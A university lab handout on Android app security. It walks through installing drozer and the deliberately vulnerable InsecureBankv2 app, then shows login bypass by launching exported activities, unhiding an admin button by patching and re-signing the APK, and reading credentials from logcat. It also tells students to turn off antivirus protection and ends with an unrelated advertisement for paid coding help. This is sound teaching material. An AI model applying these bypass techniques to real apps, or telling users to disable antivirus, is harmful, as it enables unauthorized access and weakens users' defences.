Lab05
InsecureBankv2 01
Module Code & Title:
Programme Code & Title:
Instructor:
Student Name:
Student Number:
Lab Time: dd/mm/yyyy
PLEASE BE AWARE: Do not try this lab on your personal phone. If a personal Android device is used, make a backup of the data on device.
Note: You need to submit a detailed lab report, with screenshots, to describe what you have done and what you have observed. You also need to provide explanations for the observations that are interesting or surprising. Finally, answer all questions in the lab instructions if there are any.
Task 0, Install drozer
drozer (formerly Mercury) is the leading security testing framework for Android. The website is
https://github.com/WithSecureLabs/drozer
Option 1, install latest drozer
Follow the instructions, install it with pip
pipx install drozer
Option 2, install drozer 2.4
The latest version of drozer supports python3.x. An older version is for python 2.x. If you only have Python 2.x, please install drozer 2.4.
Download drozer-2.4.4.win32.msi and save it in the python27 folder. Ignore the warning message.
Go to Windows Security Virus & threat protection, and under Virus & threat protection settings select Manage settings. Switch Real-time protection to Off.
Double click msi to install it. When asking for python version, choose the python27.
There are two options to run drozer with python2 instead of python3:
Option 1, each time before running drozer type (use your own path for python27):
set path=C:\Python27;C:\Python27\Scripts;%path%
option 2, open drozer.bat under the directory C:\Python27\Scripts, replace python.exe to C:\python27\python.exe
Back to the cmd, navigate to C:\Python27\Scripts, type:
drozer
We should see some information. Type:
drozer console connect
We should find an error.
Install libraries.
python -m pip install service_identity
After successfully installing drozer on the PC, install drozer.apk in the Android device.
download drozer.apk from
https://labs.withsecure.com/tools/drozer
select drozer (Agent .apk only)
Open Android Studio, turn on a device. Drag the apk to the device to install it. Do not use a higher version of Android. Drozer does not support it.
Open the Drozer in the device.
Task 1, install InsecureBankv2 and tools
Step 1, install python 2.7.x.
Download and install it.
Assuming that your Python installation is in C:\Python27\, add this to your PATH: C:\Python27\;C:\Python27\Scripts\
Step 2, install pip if you have not installed it.
In the CMD, try pip
pip -help
If it returns an error, navigate to the python directory, type:
python -m ensurepip --upgrade
run:
python -m pip install protobuf
python -m pip install pyopenssl
python -m pip install twisted
Step 3
InsecureBank is a purposely vulnerable app designed for educational purposes. It has a server and an apk.
https://github.com/dineshshetty/Android-InsecureBankv2
We need to launch the server so that the vulnerable app can connect to it, and we can start reversing.
Download InsecureBankv2.apk. Install it in virtual device. If it says the SDK version is lower, try this:
.\adb install --bypass-low-target-sdk-block InsecureBankv2.apk
Please use your own path for InsecureBank2.apk here.
Step 4, setup AndroLab server.
The back end for the InsecureBankv2 application is a simple python server running simple Flask and CherryPy web frameworks. The server component can be found in the AndroLabServer folder in the
InsecureBankv2 project source folder.
Download AndroLab source code. Navigate to the AndroLab directory. To set up the AndroLab server, use pip to install the necessary requirements.
C:\Python27\python.exe -m pip install -r requirements.txt
step 5,
Once all the requirements were installed, run the HTTP server on the default port 8888.
C:\Python27\python.exe app.py
If you encounter an “ImportError: No module named wsgiserver”, run
C:\Python27\python.exe -m pip install wsgiserver
If you encounter an “ImportError: No module named wsgiserver” error, change “from web.wsgiserver import CherryPyWSGIServer” to
from cheroot.wsgi import Server as CherryPyWSGIServer
then run again the “app.py” file to start the server.
view the available arguments for the AndroLab server component.
python app.py –help
Step, 6
Drag InsecureBankv2.pak file onto the emulator screen.
Or we use Android Debug Bridge (ADB) to connect to the emulator and install the InsecureBankv2 APK file.
adb install InsecureBankv2.apk
Once successfully installed, the application icon appears on the emulator.
Step 7,
Once installed, open the app.
There are pre-defined users, login with either of them.
• dinesh/Dinesh@123$
• jack/Jack@123$
When the correct set of credentials is entered, the click of the Login button redirects us to the next screen.
Task 2
Login Vulnerabilities: Login Bypass
There are two ways to bypass login. One is using apk tool to find target activity and run it through adb. The other one is using drozer.
Option one: apk + adb
Step 1, reverse engineering the apk file.
Navigate to the apktool and run
apktool d C:\{Your Path}\InsecureBankv2.apk
Step 2,
Look at the AndroidManifest.xml file. There are four exported Activities.
Find the activity name “PostLogin”. Using ADB, we can call this exported activity.
adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin
This will bring a new Activity to us that should only be available after logging in successfully, demonstrating that the login can be bypassed entirely.
Option two: drozer
Step 1,
Run drozer in the device. The Drozer server runs on port 31415 of your device. We need to set up a suitable port forward so that our PC can connect to a TCP socket opened by the Agent inside the emulator. By default, Drozer uses port 31415. Forwarding port 31415 on the host to port 31415 on the device.
adb forward tcp:31415 tcp:31415
then, connect drozer to the device:
.\drozer console connect
This time we should find that drozer is successfully installed and working.
Step 2,
Find package name of the InsecureBankv2 application
dz> run app.package.list -f bank
determine attack surface:
dz> run app.package.attacksurface com.android.insecurebankv2
We will find the following information:
Attack Surface:
5 activities exported
1 broadcast receivers exported
1 content providers exported
0 services exported
is debuggable
It enumerates exported activities along with the permissions necessary to invoke them, i.e. activities that can be launched by other processes on Android device. Let’s launch it
dz> run app.activity.info -a com.android.insecurebankv2
We will find:
Package: com.android.insecurebankv2
com.android.insecurebankv2.LoginActivity
Permission: null
com.android.insecurebankv2.PostLogin
Permission: null
com.android.insecurebankv2.DoTransfer
Permission: null
com.android.insecurebankv2.ViewStatement
Permission: null
com.android.insecurebankv2.ChangePassword
Permission: null
There are 5 exported activities. One can guess that LoginActivity is probably the one launched when the application starts. Here we will launch PostLogin activity to see what will happen.
dz> run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2. PostLogin
Questions:
What if we launch ChangePassword? Show your screenshot.
Can an unauthenticated person have access to the device? What can he/she do after that?
If we want to fix this, remove the highlighted line.
Task 3, Hidden Create User Button for Admins
Step 1, find the source code for the “LoginActivity”.
We will find that the login activity has a hidden button. A check is performed to determine if a resource string called “is_admin” is set to “no”. If this is true, then the “setVisibility(8)” method is used to set the button invisible without taking any space for layout purposes.
Step 2, patch the vulnerability.
Since this is a string resource, the value we need to modify should be located under the “/res/values/” directories in the strings.xml file. Open this file and change the “is_admin” value from “no” to “yes”, then save the changes.
Step 3,
Use apktool again to rebuild the application with the now modified strings.xml file.
apktool b -f -d InsecureBankv2/
We can find the new generated apk in folder dist.
Sign it.
Find the tool zipalign and apksigner, for me they are in folder
uninstall the unaltered version of the application from the emulator before installing the new APK.
# install
adb install button_InsecureBankv2-final.apk
Once successfully installed, open the application and a new button called “Create user” appears.
Step 7,
However, looking at the source code for the “createUser()” method shows that the button does not actually allow us to create a user, so this concludes the vulnerability.
Task 4, Insecure Logging
The “DoLogin” activity produces a debug log message whenever a user attempts to login.
These logs can be dumped using logcat. The command below will show all the log messages for the application while it is running.
adb logcat | grep "$(adb shell ps | grep com.android.insecurebankv2 | awk '{print $2}')"
If we attempt to login while logcat is running, we will see a log message that shows the username and password we used to successfully login.
Examining the code carefully, we find if the username is “devadmin”, the application does not require a password.
請加QQ:99515681 郵箱:99515681@qq.com WX:codinghelp
